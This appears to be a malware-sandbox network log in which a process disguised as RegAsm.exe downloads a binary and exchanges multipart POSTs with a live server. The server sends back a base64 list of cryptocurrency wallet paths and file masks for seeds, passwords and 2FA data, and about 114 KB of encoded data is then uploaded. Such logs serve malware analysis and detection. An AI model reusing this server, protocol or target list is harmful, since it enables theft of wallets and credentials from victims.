2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49727	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:02 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:02 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------BKKFCFBKFCFBFIDGCGDHCont
2024-09-26 23:38:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49728	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:04 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:04 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------HCFIIIJJKJKFHIDGDBAKCont
2024-09-26 23:38:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:04 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49729	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:05 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:05 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------HCBAKJEHDBGHIEBGCGDGCont
2024-09-26 23:38:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:06 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49731	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:06 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:06 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------CBKFIECBGDHJKECAKFBGCont
2024-09-26 23:38:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49732	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:08 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 113909 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------GHJDHDAECBGCAKEBAEBACont
2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 6e 5a 56 55 37 70 57 30 56 30 30 76 79 2f 41 50 46 6b 67 75 64 66 38 4e 36 64 46 38 31 78 39 74 57 36 5a 52 2f 43 69 63 6b 6e 39 66 79 4e 63 6a 34 33 2f 77 43 52 74 75 2f 39 32 50 38 41 39 41 57 75 37 30 48 77 36 2b 6e 58 4d 32 70 61 6a 63 2f 62 4e 56 75 42 69 53 62 47 46 52 66 37 71 6a 73 50 38 38 56 77 6e 6a 66 2f 41 4a 47 32 38 2b 6b 66 2f 6f 43 31 70 67 4a 52 2b 73 52 68 46 33 53 54 31 4f 58 4e 6f 79 2b 71 53 6e 4a 57 62 61 30 4f 65 70 4b 57 69 76 6f 54 35 49 53 69 6c 70 4b 59 45 33 77 39 76 72 53 33 31 71 36 73 74 51 75 49 34 4c 4c 55 4c 4f 53 33 6b 65 52 77 71 6a 49 7a 6b 6b 38 64 41 52 2b 4e 64 6c 70 58 69 4c 53 4c 2f 77 41 59 61 39 61 33 31 37 62 52 36 66 35 6c 76 4a 61 75 38 79 72 48 6d 42 68 6a 61 78 4f 44 6b 67 48 33 47 61 34 50 52 66 43 6e 39 Data Ascii: nZVU7pW0V00vy/APFkgudf8N6dF81x9tW6ZR/Cickn9fyNcj43/wCRtu/92P8A9AWu70Hw6+nXM2pajc/bNVuBiSbGFRf7qjsP88Vwnjf/AJG28+kf/oC1pgJR+sRhF3ST1OXNoy+qSnJWba0OepKWivoT5ISilpKYE3w9vrS31q6stQuI4LLULOS3keRwqjIzkk8dAR+NdlpXiLSL/wAYa9a317bR6f5lvJau8yrHmBhjaxODkgH3Ga4PRfCn9
2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 66 7a 33 4e 72 5a 51 4b 6c 70 4a 63 77 66 5a 72 64 55 61 46 6b 49 77 70 59 41 46 67 51 64 76 7a 45 6e 4a 48 65 6f 33 30 56 76 73 6f 74 6f 4a 2f 4a 68 4c 78 79 4d 49 77 41 53 38 65 64 6a 41 34 79 43 4e 78 36 48 76 56 79 34 6c 31 61 57 47 61 43 56 4e 4e 76 49 5a 69 72 79 4c 4c 61 6f 68 64 31 4f 56 64 79 67 55 79 45 48 6e 44 37 6c 4f 65 51 61 38 69 65 47 78 53 63 70 62 33 32 31 32 30 57 70 37 31 50 47 59 47 53 68 48 34 65 2b 6d 36 31 30 44 2b 30 52 62 32 56 37 63 2f 61 64 4b 73 43 4c 62 53 57 45 31 39 5a 2b 63 67 38 32 46 32 66 41 45 62 2f 4d 78 41 4f 63 44 70 79 52 56 71 7a 75 32 68 6b 75 4e 39 74 59 57 36 72 72 6c 30 6a 32 46 7a 43 73 30 38 31 75 6b 63 62 2b 56 45 2b 30 67 4e 74 4a 78 38 36 38 6b 59 4a 72 4c 67 73 74 53 69 6d 76 4a 7a 64 57 30 72 33 6a 52 Data Ascii: fz3NrZQKlpJcwfZrdUaFkIwpYAFgQdvzEnJHeo30VvsotoJ/JhLxyMIwAS8edjA4yCNx6HvVy4l1aWGaCVNNvIZiryLLaohd1OVdygUyEHnD7lOeQa8ieGxScpb32120Wp71PGYGShH4e+m610D+0Rb2V7c/adKsCLbSWE19Z+cg82F2fAEb/MxAOcDpyRVqzu2hkuN9tYW6rrl0j2FzCs081ukcb+VE+0gNtJx868kYJrLgstSimvJzdW0r3jR
2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 46 46 46 41 78 4b 4b 57 6b 6f 41 4b 51 30 74 46 41 30 4a 52 52 52 54 47 46 4a 53 30 47 6b 41 6c 49 61 57 69 67 42 4b 4b 4b 4b 59 42 52 52 32 70 4b 59 77 6f 6f 6f 6f 41 53 69 69 69 6d 41 47 6b 6f 6f 6f 47 46 46 46 46 41 43 55 55 74 4a 51 41 55 55 55 47 67 59 55 55 67 6f 4e 4d 41 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 4e 4d 41 6f 6f 6f 70 6a 45 6f 6f 4e 46 41 42 52 53 55 74 41 77 6f 70 4b 57 67 41 70 4b 4b 4b 59 43 30 5a 70 4b 53 67 43 53 49 2f 76 55 2f 33 68 2f 4f 74 2b 38 50 2b 6d 53 2f 57 75 66 54 2f 57 4c 2f 41 4c 77 72 66 76 50 2b 50 75 54 36 2f 77 42 4b 35 36 76 78 6f 53 2b 49 68 6f 70 4b 51 31 4a 6f 4c 52 53 55 55 79 67 4e 4c 53 55 5a 6f 45 4c 53 55 55 55 44 43 69 69 69 6d 41 75 61 4d 38 30 32 6c 39 36 51 57 48 5a 39 52 52 6b Data Ascii: FFFAxKKWkoAKQ0tFA0JRRRTGFJS0GkAlIaWigBKKKKYBRR2pKYwooooASiiimAGkoooGFFFFACUUtJQAUUUGgYUUgoNMAooooAKSlpDQMKKKKACkooNMAooopjEooNFABRSUtAwopKWgApKKKYC0ZpKSgCSI/vU/3h/Ot+8P+mS/WufT/WL/ALwrfvP+PuT6/wBK56vxoS+IhopKQ1JoLRSUUygNLSUZoELSUUUDCiiimAuaM802l96QWHZ9RRk
2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 55 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 51 4b 59 42 52 32 70 61 4b 41 45 6f 6f 6f 6f 41 44 53 55 74 4a 51 41 55 55 55 55 49 59 6c 46 42 6f 6f 41 4b 53 6c 70 4f 39 41 77 6f 6f 6f 6f 41 4b 53 6c 70 4d 55 44 43 69 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 4b 4b 42 68 53 55 74 49 61 41 43 67 30 55 55 78 69 55 6c 4c 52 51 41 6c 46 47 4b 4b 59 77 78 52 69 69 69 67 59 59 70 75 4b 64 53 55 41 4a 52 51 61 4b 59 42 53 55 74 47 4b 42 69 55 6c 4f 78 53 45 55 41 4a 52 53 30 68 6f 43 34 6c 47 4b 57 6c 6f 41 53 6b 70 61 4b 59 78 4b 53 6e 59 70 4f 74 41 43 55 55 55 59 70 67 46 47 4b 57 6b 6f 47 4a 52 52 52 51 41 6d 4b 4b 57 6b 70 6a 44 46 47 4b 4d 55 59 6f 41 53 6b 78 54 73 55 59 70 6a 45 78 52 53 34 6f 78 51 49 41 4f 61 33 72 37 2f 6a 36 50 2b 36 76 38 68 Data Ascii: UUtFACUUUUAFJS0UAJRRQKYBR2paKAEooooADSUtJQAUUUUIYlFBooAKSlpO9AwooooAKSlpMUDCilooASiiigBKKKKBhSUtIaACg0UUxiUlLRQAlFGKKYwxRiiigYYpuKdSUAJRQaKYBSUtGKBiUlOxSEUAJRS0hoC4lGKWloASkpaKYxKSnYpOtACUUUYpgFGKWkoGJRRRQAmKKWkpjDFGKMUYoASkxTsUYpjExRS4oxQIAOa3r7/j6P+6v8h
